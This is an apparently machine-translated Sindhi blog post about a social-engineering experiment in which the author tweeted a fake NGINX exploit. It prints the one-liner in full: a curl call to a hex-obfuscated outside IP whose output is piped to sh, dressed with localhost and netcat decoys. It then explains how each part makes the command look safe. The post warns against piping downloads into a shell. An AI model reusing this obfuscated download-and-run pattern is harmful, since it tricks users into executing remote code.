جعلي نينڪس استحصال سان سماجي تجربو جي ڪاميابي

نوٽ. ترجمو: ليکڪ اصل نوٽ، 1 جون تي شايع ٿيل، ڄاڻ جي حفاظت ۾ دلچسپي رکندڙ ماڻهن جي وچ ۾ هڪ تجربو ڪرڻ جو فيصلو ڪيو. هن کي ڪرڻ لاء، هن ويب سرور ۾ اڻ ڄاڻايل نقصان جي لاء هڪ جعلي استحصال تيار ڪيو ۽ ان کي پنهنجي Twitter تي پوسٽ ڪيو. هن جا مفروضا - فوري طور تي ماهرن طرفان بي نقاب ٿيڻ لاءِ جيڪي ڪوڊ ۾ واضح ٺڳيءَ کي ڏسندا - نه صرف سچا نه ٿيا ... اهي سڀني اميدن کان وڌي ويا ، ۽ ان جي ابتڙ: ٽوئيٽ کي ڪيترن ئي ماڻهن جي وڏي مدد ملي ، جن نه ڪيو. ان جي مواد چيڪ ڪريو.

TL؛ DR: ڪنهن به حالت ۾ sh يا bash ۾ فائل پائپ لائننگ استعمال نه ڪريو. اهو توهان جي ڪمپيوٽر جي ڪنٽرول کي وڃائڻ جو هڪ بهترين طريقو آهي.

مان توهان سان هڪ مزاحيه PoC استحصال بابت هڪ مختصر ڪهاڻي شيئر ڪرڻ چاهيان ٿو جيڪا 31 مئي تي ٺاهي وئي هئي. خبرن جي جواب ۾ هو فوري طور تي ظاهر ٿيو اليسا ايسج شيوچينڪو، ميمبر صفر ڏينهن جي شروعات (ZDI)، جيڪا معلومات NGINX ۾ خطري جي باري ۾ RCE (ريموٽ ڪوڊ جي عمل) جي حوالي سان جلدي ظاهر ڪئي ويندي. NGINX کان وٺي ڪيترن ئي ويب سائيٽن کي طاقت ڏئي ٿو، خبر ضرور هڪ بم ڌماڪو هوندو. پر "ذميوار ظاهر ڪرڻ" جي عمل ۾ دير جي ڪري، ڇا ٿيو جا تفصيل معلوم نه هئا - اهو معياري ZDI عمل آهي.

ٽوئيٽ NGINX ۾ خطري جي ظاهر بابت

ڪرل ۾ هڪ نئين اوباسڪيشن ٽيڪنڪ تي ڪم ڪرڻ کان پوءِ، مون اصل ٽوئيٽ جو حوالو ڏنو ۽ ”ليڪ ڪيو ڪم ڪندڙ پي او سي“ جنهن ۾ ڪوڊ جي هڪ واحد لائن شامل آهي جيڪا دريافت ٿيل ڪمزوري جو استحصال ڪري ٿي. يقينن، اها مڪمل بيوقوف هئي. مون فرض ڪيو ته مون کي فوري طور تي بي نقاب ڪيو ويندو، ۽ اهو بهترين طور تي مون کي ٻه ريٽيٽ حاصل ڪندس (او سٺو).

ٽوئيٽ جعلي استحصال سان

بهرحال، مان تصور نه ڪري سگهيو ته اڳتي ڇا ٿيو. منهنجي ٽوئيٽ جي مقبوليت آسمان تي پهچي وئي. حيرت انگيز طور تي، هن وقت (15:00 ماسڪو ٽائيم 1 جون) ڪجھه ماڻهو اهو محسوس ڪيو آهي ته اهو جعلي آهي. ڪيترائي ماڻهو ان کي چيڪ ڪرڻ کان سواءِ ان کي ريٽويٽ ڪندا آهن (اڪيلو ڇڏي ڏيو پياري ASCII گرافڪس جي تعريف ڪندي ان کي آئوٽ ڪيو).

بس ڏسو اهو ڪيترو خوبصورت آهي!

جڏهن ته اهي سڀئي لوپ ۽ رنگ عظيم آهن، اهو واضح آهي ته ماڻهن کي انهن کي ڏسڻ لاء انهن جي مشين تي ڪوڊ هلائڻو پوندو. خوشقسمتيءَ سان، برائوزر ساڳيءَ طرح ڪم ڪن ٿا، ۽ ان حقيقت سان ملائي ٿو ته مان واقعي قانوني مصيبت ۾ ڦاسڻ نه ٿو چاهيان، منهنجي سائيٽ ۾ دفن ٿيل ڪوڊ ڪنهن به اضافي ڪوڊ کي انسٽال ڪرڻ يا عمل ڪرڻ جي ڪوشش کان سواءِ صرف گونج ڪال ڪري رهيو هو.

ننڍو تڪرار: netspooky, dnzمان ۽ ٽيم جا ٻيا ماڻهو ٺڳ اسان ڪجھه عرصي کان ڪرل ڪمانڊ کي مبهم ڪرڻ لاءِ مختلف طريقن سان راند ڪري رھيا آھيون ڇاڪاڻ ته اھو ٿڌو آھي... ۽ اسان جيڪ آھيون. netspooky ۽ dnz ڪيترائي نوان طريقا دريافت ڪيا جيڪي مون لاءِ انتهائي اميد رکندڙ لڳي رهيا هئا. مان مزو ۾ شامل ٿيو ۽ چالن جي بيگ ۾ IP decimal تبديليون شامل ڪرڻ جي ڪوشش ڪئي. اهو ظاهر ٿئي ٿو ته IP پڻ هيڪساڊيڪل فارميٽ ۾ تبديل ٿي سگهي ٿو. ان کان علاوه، curl ۽ گھڻا ٻيا NIX اوزار خوشيء سان کائيندا آھن hexadecimal IPs! تنهنڪري اهو صرف هڪ قائل ۽ محفوظ ڏسندڙ ڪمانڊ لائن ٺاهڻ جو معاملو هو. آخرڪار مون هن تي آباد ڪيو:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

سماجي-اليڪٽرانڪ انجنيئرنگ (SEE) - صرف فشنگ کان وڌيڪ

حفاظت ۽ واقفيت هن تجربي جو هڪ اهم حصو هئا. منهنجو خيال آهي ته اهي ئي آهن جيڪي هن جي ڪاميابي جو سبب بڻيا آهن. ڪمانڊ لائن واضح طور تي "127.0.0.1" (مشهور لوڪل هوسٽ) جي حوالي سان سيڪيورٽي کي واضح ڪري ٿو. Localhost سمجهي وڃي ٿو محفوظ ۽ ان تي ڊيٽا ڪڏهن به توهان جي ڪمپيوٽر کي نه ڇڏي.

واقفيت تجربي جو ٻيو اهم SEE جزو هو. جيئن ته ٽارگيٽ سامعين بنيادي طور تي ڪمپيوٽر جي سيڪيورٽي جي بنيادي ڳالهين کان واقف ماڻهن تي مشتمل آهي، اهو ضروري هو ته ڪوڊ ٺاهيو وڃي ته جيئن ان جا حصا واقف ۽ واقف هجن (۽ انهي ڪري محفوظ). پراڻن استحصالي تصورن جا عنصر قرض وٺڻ ۽ انهن کي غير معمولي طريقي سان گڏ ڪرڻ تمام ڪامياب ثابت ٿيو آهي.

هيٺ ڏنل ون لائنر جو تفصيلي تجزيو آهي. هن لسٽ تي هر شي پائڻ کاسمیٹڪ فطرت، ۽ عملي طور ڪجھ به ان جي حقيقي آپريشن جي ضرورت نه آهي.

ڪهڙا اجزاء واقعي ضروري آهن؟ هي -gsS, -O 0x0238f06a, |sh ۽ ويب سرور پاڻ. ويب سرور ۾ ڪا به خراب هدايتون شامل نه هيون، پر صرف ڪمانڊ استعمال ڪندي ASCII گرافڪس جي خدمت ڪئي echo لکت ۾ شامل آهي index.html. جڏهن صارف هڪ لڪير ۾ داخل ٿيو |sh وچ ۾، index.html لوڊ ڪيو ويو ۽ عمل ڪيو ويو. خوشقسمتيء سان، ويب سرور جي سنڀاليندڙن کي ڪو به خراب ارادو نه هو.

• ../../../%00 - ڊاريڪٽري کان ٻاهر وڃڻ جي نمائندگي ڪري ٿو؛
• ngx_stream_module.so - بي ترتيب واري NGINX ماڊل ڏانھن رستو؛
• /bin/sh%00<'protocol:TCP' - اسان فرض ڪري رهيا آهيون لانچ ڪري رهيا آهيون /bin/sh ھدف واري مشين تي ۽ ٻاھر موڪليو ٽي سي پي چينل ڏانھن؛
• -O 0x0238f06a#PLToffset - ڳجهو جزو، اضافي #PLToffset, ڏسڻ لاء هڪ ياداشت آفسٽ ڪنهن به طرح PLT ۾ شامل آهي؛
• |sh; - ٻيو اهم حصو. اسان کي ضرورت آهي ته آئوٽ کي sh/bash ڏانهن ريڊائريڪٽ ڪرڻ لاءِ ڪوڊ تي عمل ڪرڻ لاءِ جيڪو حملو ڪندڙ ويب سرور تي واقع آهي. 0x0238f06a (2.56.240.x);
• nc /dev/tcp/localhost - هڪ ڊمي جنهن ۾ netcat ڏانهن اشارو آهي /dev/tcp/localhostته جيئن هر شي ٻيهر محفوظ نظر اچي. حقيقت ۾، اهو ڪجھ به نه ڪندو آهي ۽ خوبصورتي لاء قطار ۾ شامل آهي.

هي ون لائين اسڪرپٽ جي ڊيڪوڊنگ کي ختم ڪري ٿو ۽ "سماجي-اليڪٽرانڪ انجنيئرنگ" (پيچيده فشنگ) جي پهلوئن جي بحث کي.

ويب سرور جي ٺاھ جوڙ ۽ countermeasures

جيئن ته منهنجي سبسڪرائبرز جي وڏي اڪثريت infosec/hackers آهن، مون فيصلو ڪيو ته ويب سرور کي ٿورو وڌيڪ مزاحم بڻائڻ جو انهن جي طرف کان "دلچسپي" جي اظهار لاء، صرف انهي ڪري ته ماڻهن کي ڪجهه ڪرڻو پوندو (۽ اهو مزو هوندو. سيٽ اپ ڪريو). مان هتي سڀني نقصانن کي لسٽ ڪرڻ وارو نه آهيان ڇاڪاڻ ته تجربو اڃا تائين جاري آهي، پر هتي ڪجھ شيون آهن سرور ڪري ٿو:

• فعال طور تي ڪجهه سماجي نيٽ ورڪن تي ورهائڻ جي ڪوششن کي مانيٽر ڪري ٿو ۽ صارف کي لنڪ تي ڪلڪ ڪرڻ جي حوصلا افزائي ڪرڻ لاءِ مختلف ڏيکيندڙ تمبنيلس کي متبادل ڪري ٿو.
• شيل اسڪرپٽ ڏيکارڻ بدران Chrome/Mozilla/Safari/etc کي Thugcrowd پروموشنل وڊيو ڏانهن منتقل ڪري ٿو.
• دخل اندازي/ واضح هيڪنگ جي واضح نشانين لاءِ ڏسندو آهي، ۽ پوءِ NSA سرورز (ha!) ڏانهن درخواستن کي ريڊائريڪٽ ڪرڻ شروع ڪندو آهي.
• انسٽال ڪري ٿو هڪ ٽروجن، گڏوگڏ هڪ BIOS روٽ ڪٽ، سڀني ڪمپيوٽرن تي جن جا استعمال ڪندڙ ميزبان کي باقاعده برائوزر کان دورو ڪندا آهن (صرف مذاق!).

antimers جو هڪ ننڍڙو حصو

انهي صورت ۾، منهنجو واحد مقصد هو Apache جي ڪجهه خاصيتن کي ماهر ڪرڻ - خاص طور تي، درخواستن کي ريڊائريڪٽ ڪرڻ لاء سٺا ضابطا - ۽ مون سوچيو: ڇو نه؟

NGINX استحصال (حقيقي!)

رڪنيت لاءِ @alisaesage Twitter تي ۽ فالو ڪريو ZDI جي عظيم ڪم کي خطاب ڪرڻ ۾ تمام حقيقي خطرن کي حل ڪرڻ ۽ NGINX ۾ موقعن جو استحصال. انهن جي ڪم هميشه مون کي متوجه ڪيو آهي ۽ مان ايلس جو شڪرگذار آهيان هن جي صبر جي سڀني ذڪرن ۽ اطلاعن سان منهنجي بيوقوف ٽوئيٽ سبب. خوشقسمتيء سان، اهو پڻ ڪجهه سٺو ڪيو: اهو NGINX جي خطرات جي شعور کي وڌائڻ ۾ مدد ڪئي، ۽ انهي سان گڏ مشڪلاتن جي بدعنواني سبب پيدا ٿيل مسئلا.

جو ذريعو: www.habr.com